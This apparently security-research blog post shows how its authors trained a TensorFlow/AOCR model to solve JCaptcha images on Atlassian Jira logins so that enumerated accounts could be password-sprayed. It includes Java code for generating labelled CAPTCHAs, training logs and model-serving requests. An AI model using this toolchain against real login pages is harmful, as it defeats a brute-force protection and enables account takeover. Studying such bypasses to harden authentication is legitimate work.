Introduction
In early 2020, we had a situation where we wanted to abuse a known username enumeration issue in Atlassian products. The vulnerability allows to enumerate valid username, but if an attacker wants to bruteforce the identified accounts, a CAPTCHA is displayed in the login page and prevents actual exploitation of the vulnerability.
We therefore looked for a way to automatically bypass this protection. We came upon this article published by F-Secure where they describe a methodology that uses machine learning algorithms to break CAPTCHAs. This seemed like the perfect tool for our purpose. This post will guide you through our process.
Technologies
F-Secure solution is based on AOCR and Tensorflow. They also provided some utility scripts written in Python to help during the classification and labeling phases.
We noticed that Alassian products use the JCaptcha library which was last updated in September 2012. This library produce relatively simple text CAPTCHAS by default, giving us the sense that they _could_ be broken.
Experiment
Initial Setup
Following F-Secure explanations in their Github article we installed Tensorflow on our test server. Note that AOCR works with Tensorflow version 1, and we wanted to used our GPUs, we therefore installed the package "tensorflow-gpu" and the dependencies (CUDA, CUPTI, cuDNN) following the official documentation. We had to try a few different tensorflow-gpu versions to avoid issues with our hardware, and ended-up using tensorflow-gpu v1.8.
Generating a test set
To produce a valid test set while avoiding the hassle of manually labeling CAPTCHAs, we wrote a piece of Java code that would generate CAPTCHA image files using JCaptcha libary. This piece of code would take advantage of Java introspection in order to name the file after the CAPTCHA value.
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.lang.reflect.Field;
import javax.imageio.ImageIO;
import com.octo.captcha.engine.image.gimpy.DefaultGimpyEngine;
import com.octo.captcha.image.ImageCaptchaFactory;
import com.octo.captcha.image.gimpy.Gimpy;
public class Main {
public static void main(String[] args) throws NoSuchFieldException, SecurityException, IllegalArgumentException, IllegalAccessException, FileNotFoundException, IOException {
if (args.length != 2) {
System.out.println("Usage: java -jar capatcha-generator.jar <number of captchas> <directory to write in>");
System.exit(0);
}
// Factory stuff
DefaultGimpyEngine bge = new DefaultGimpyEngine();
ImageCaptchaFactory factory = bge.getImageCaptchaFactory();
int num = Integer.parseInt(args[0]);
String dir = args[1];
if (! dir.endsWith("/"))
dir = dir + "/";
System.out.println("Generating " + num + " captchas in " + dir + " directory");
for(int i=0; i<num; i++) {
Gimpy pixCaptcha = (Gimpy) factory.getImageCaptcha();
// Introspection to get CAPTCHA response, which is a private field
Field privateStringField;
String fieldValue;
privateStringField = Gimpy.class.getDeclaredField("response");
privateStringField.setAccessible(true);
fieldValue = (String) privateStringField.get(pixCaptcha);
// write to JPEG file using Java 8 APIs
BufferedImage bi = pixCaptcha.getImageChallenge();
// System.out.println("About to create " + dir+fieldValue+".jpeg");
File f = new File(dir+fieldValue+".jpeg");
ImageIO.write(bi, "jpeg", new FileOutputStream(f));
}
System.exit(0);
}
}
You can download the JAR file from this archive and use it to generate an arbitrary number of CAPTCHAs, that will be stored in the mentioned directory. In our case, we generated around 20 000 CAPTCHAs image:
The generated images are small (200x70) JPEG files:
test/taiders.jpeg: JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x70, components 3
Getting everything ready
We used a slightly modified version of F-Secure script, and generated the list file:
We split the file in two parts: one for the training phase (with 18000 CAPTCHAS), and one for the testing (with 2073 CAPTCHAs).
We then generated the tfrecords
files using AOCR:
aocr dataset test_labels.txt testing.tfrecords
Training the model
We then started training the model with AOCR, specifying our images width and height explicitly:
Using tensorflow-gpu
with our 6 NVidia GPUs, we quickly got small enough perplexity
and loss
values:
2020-04-02 15:42:14,941 root INFO Step 5701: 0.138s, loss: 0.002095, perplexity: 1.002097.
2020-04-02 15:42:15,095 root INFO Step 5702: 0.144s, loss: 0.000374, perplexity: 1.000374.
2020-04-02 15:42:15,248 root INFO Step 5703: 0.146s, loss: 0.000511, perplexity: 1.000512.
2020-04-02 15:42:15,403 root INFO Step 5704: 0.148s, loss: 0.002965, perplexity: 1.002969.
2020-04-02 15:42:15,555 root INFO Step 5705: 0.145s, loss: 0.000307, perplexity: 1.000307.
2020-04-02 15:42:15,704 root INFO Step 5706: 0.142s, loss: 0.000300, perplexity: 1.000300.
2020-04-02 15:42:15,859 root INFO Step 5707: 0.145s, loss: 0.000259, perplexity: 1.000259.
2020-04-02 15:42:16,003 root INFO Step 5708: 0.136s, loss: 0.002224, perplexity: 1.002226.
Time to see the magic happen by testing the model !
Testing the model
We started the AOCR testing phase and immediately observed interesting results:
...TRIMMED...
2020-04-02 15:43:15,675 root INFO Step 2046 (0.016s). Accuracy: 99.11%, loss: 0.018858, perplexity: 1.01904, probability: 86.00% 100% (LINENER)
2020-04-02 15:43:15,694 root INFO Step 2047 (0.017s). Accuracy: 99.11%, loss: 0.000010, perplexity: 1.00001, probability: 99.99% 100% (BODMING)
2020-04-02 15:43:15,711 root INFO Step 2048 (0.017s). Accuracy: 99.11%, loss: 0.320211, perplexity: 1.37742, probability: 92.24% 86% (RAMATER vs NAMATER)
2020-04-02 15:43:15,728 root INFO Step 2049 (0.016s). Accuracy: 99.11%, loss: 0.000018, perplexity: 1.00002, probability: 99.98% 100% (CHEGING)
2020-04-02 15:43:15,746 root INFO Step 2050 (0.017s). Accuracy: 99.11%, loss: 0.000004, perplexity: 1.00000, probability: 100.00% 100% (CURTERS)
2020-04-02 15:43:15,764 root INFO Step 2051 (0.017s). Accuracy: 99.11%, loss: 0.000289, perplexity: 1.00029, probability: 99.77% 100% (OFFOTON)
2020-04-02 15:43:15,781 root INFO Step 2052 (0.016s). Accuracy: 99.11%, loss: 0.000023, perplexity: 1.00002, probability: 99.98% 100% (BRAEVER)
2020-04-02 15:43:15,798 root INFO Step 2053 (0.017s). Accuracy: 99.11%, loss: 0.000014, perplexity: 1.00001, probability: 99.99% 100% (KINVING)
2020-04-02 15:43:15,816 root INFO Step 2054 (0.017s). Accuracy: 99.11%, loss: 0.006647, perplexity: 1.00667, probability: 94.82% 100% (RULTING)
2020-04-02 15:43:15,840 root INFO Step 2055 (0.023s). Accuracy: 99.11%, loss: 0.003970, perplexity: 1.00398, probability: 96.87% 100% (BIRSTIC)
2020-04-02 15:43:15,858 root INFO Step 2056 (0.017s). Accuracy: 99.11%, loss: 0.000272, perplexity: 1.00027, probability: 99.78% 100% (LOVINER)
2020-04-02 15:43:15,877 root INFO Step 2057 (0.018s). Accuracy: 99.11%, loss: 0.000056, perplexity: 1.00006, probability: 99.95% 100% (ACRTING)
2020-04-02 15:43:15,894 root INFO Step 2058 (0.016s). Accuracy: 99.11%, loss: 0.000036, perplexity: 1.00004, probability: 99.97% 100% (OLDHTLY)
2020-04-02 15:43:15,912 root INFO Step 2059 (0.018s). Accuracy: 99.11%, loss: 0.000003, perplexity: 1.00000, probability: 100.00% 100% (WALTEST)
2020-04-02 15:43:15,929 root INFO Step 2060 (0.016s). Accuracy: 99.11%, loss: 0.000174, perplexity: 1.00017, probability: 99.86% 100% (NEENTER)
2020-04-02 15:43:15,946 root INFO Step 2061 (0.016s). Accuracy: 99.11%, loss: 0.000142, perplexity: 1.00014, probability: 99.89% 100% (SELKING)
2020-04-02 15:43:15,964 root INFO Step 2062 (0.017s). Accuracy: 99.11%, loss: 0.000082, perplexity: 1.00008, probability: 99.93% 100% (SOLHING)
2020-04-02 15:43:15,982 root INFO Step 2063 (0.017s). Accuracy: 99.11%, loss: 0.000151, perplexity: 1.00015, probability: 99.88% 100% (VALHINE)
2020-04-02 15:43:16,000 root INFO Step 2064 (0.018s). Accuracy: 99.11%, loss: 0.000003, perplexity: 1.00000, probability: 99.99% 100% (METGEST)
2020-04-02 15:43:16,018 root INFO Step 2065 (0.017s). Accuracy: 99.11%, loss: 0.000076, perplexity: 1.00008, probability: 99.94% 100% (KICELED)
2020-04-02 15:43:16,036 root INFO Step 2066 (0.018s). Accuracy: 99.11%, loss: 0.000014, perplexity: 1.00001, probability: 99.99% 100% (UNWORED)
2020-04-02 15:43:16,055 root INFO Step 2067 (0.018s). Accuracy: 99.12%, loss: 0.000011, perplexity: 1.00001, probability: 99.97% 100% (LISNGES)
2020-04-02 15:43:16,072 root INFO Step 2068 (0.016s). Accuracy: 99.12%, loss: 0.000005, perplexity: 1.00000, probability: 99.99% 100% (BOUGERS)
2020-04-02 15:43:16,090 root INFO Step 2069 (0.017s). Accuracy: 99.12%, loss: 0.000045, perplexity: 1.00005, probability: 99.96% 100% (HOUDINE)
2020-04-02 15:43:16,107 root INFO Step 2070 (0.016s). Accuracy: 99.12%, loss: 0.000005, perplexity: 1.00000, probability: 100.00% 100% (BRATERS)
2020-04-02 15:43:16,124 root INFO Step 2071 (0.016s). Accuracy: 99.11%, loss: 0.237502, perplexity: 1.26808, probability: 84.77% 86% (MORICLY vs MONICLY)
2020-04-02 15:43:16,142 root INFO Step 2072 (0.017s). Accuracy: 99.11%, loss: 0.000013, perplexity: 1.00001, probability: 99.99% 100% (DEAERED)
...TRIMMED...
The results were really good, most of the CAPTCHAs were correctly solved. Overall, using our training set of 2073 CAPTCHAs, 1970 of them were successfully recognized by our model, and 103 were incorrect, which result in approximately 95% of correct guesses.
Serving the model
The results of the previous phase were really good, but we now wanted to use them in real world to confirm the accuracy of the model. We first exported the model with AOCR:
...SKIPPED...
2020-04-14 13:14:39,385 root INFO Creating a SavedModel.
2020-04-14 13:14:39,862 root INFO Exported SavedModel into captcha-breaking-laptop
This will create a new directory named after your model, with the following content:
.
├── saved_model.pb
└── variables
├── variables.data-00000-of-00003
├── variables.data-00001-of-00003
├── variables.data-00002-of-00003
└── variables.index
1 directory, 5 files
We then used Tensorflow Serving to deploy an HTTP API serving our model, and submit CAPTCHAs generated by our Jira instance. TensorFlow serving expects to point to a base directory which includes a version subdirectory. So, inside the directory created in last step, create a sub-directory named 1
, and copy the saved_model.pb
file and the variables
directory, then start the serving server with the command:
You can then base64-encode a CAPTCHA and send it to the server with a POST request like:
Host: localhost:9001
cache-control: no-cache
content-type: application/json
Content-Length: 3483
{
"signature_name": "serving_default",
"inputs": {
"input": { "b64": "< Base64 encoded CAPTCHA >" }
}
}
The server will then answer with the estimated CAPTCHA value, along with its probability. The probability can be particularly useful in case of a real-world bruteforce attack, to avoid submitting a CAPTCHA if the model is not confident enough.
Content-Type: application/json
Date: Tue, 14 Apr 2020 12:17:09 GMT
Content-Length: 98
{
"outputs": {
"output": "GARRILY",
"probability": 0.39653096788033193
}
}
Attacking Jira instance
The last step of our experiment was to deploy everything and start password spraying the Jira instance to confirm it works as expected. We wrote a Python script to connect to our Jira instance and get a CAPTCHA, then base64-encode it and submit it to our deployed Tensorflow Server. Depending on the probability of a correct guess, we either submit the request with the CAPTCHA response, or just ask for another CAPTCHA to solve until we have a high enough probability.
Conclusion
We demonstrated that research published by F-Secure on CAPTCHA breaking is fully actionable, even against widespread CAPTCHA libraries such as JCaptcha. We hope that this article will provide some added value to would-be CAPTCHA breakers, especially when it comes to instrumenting the CAPTCHA libraries against themselves in order to not waste time labeling entries manually.
This post was written by Quentin Kaiser and Antoine Roly.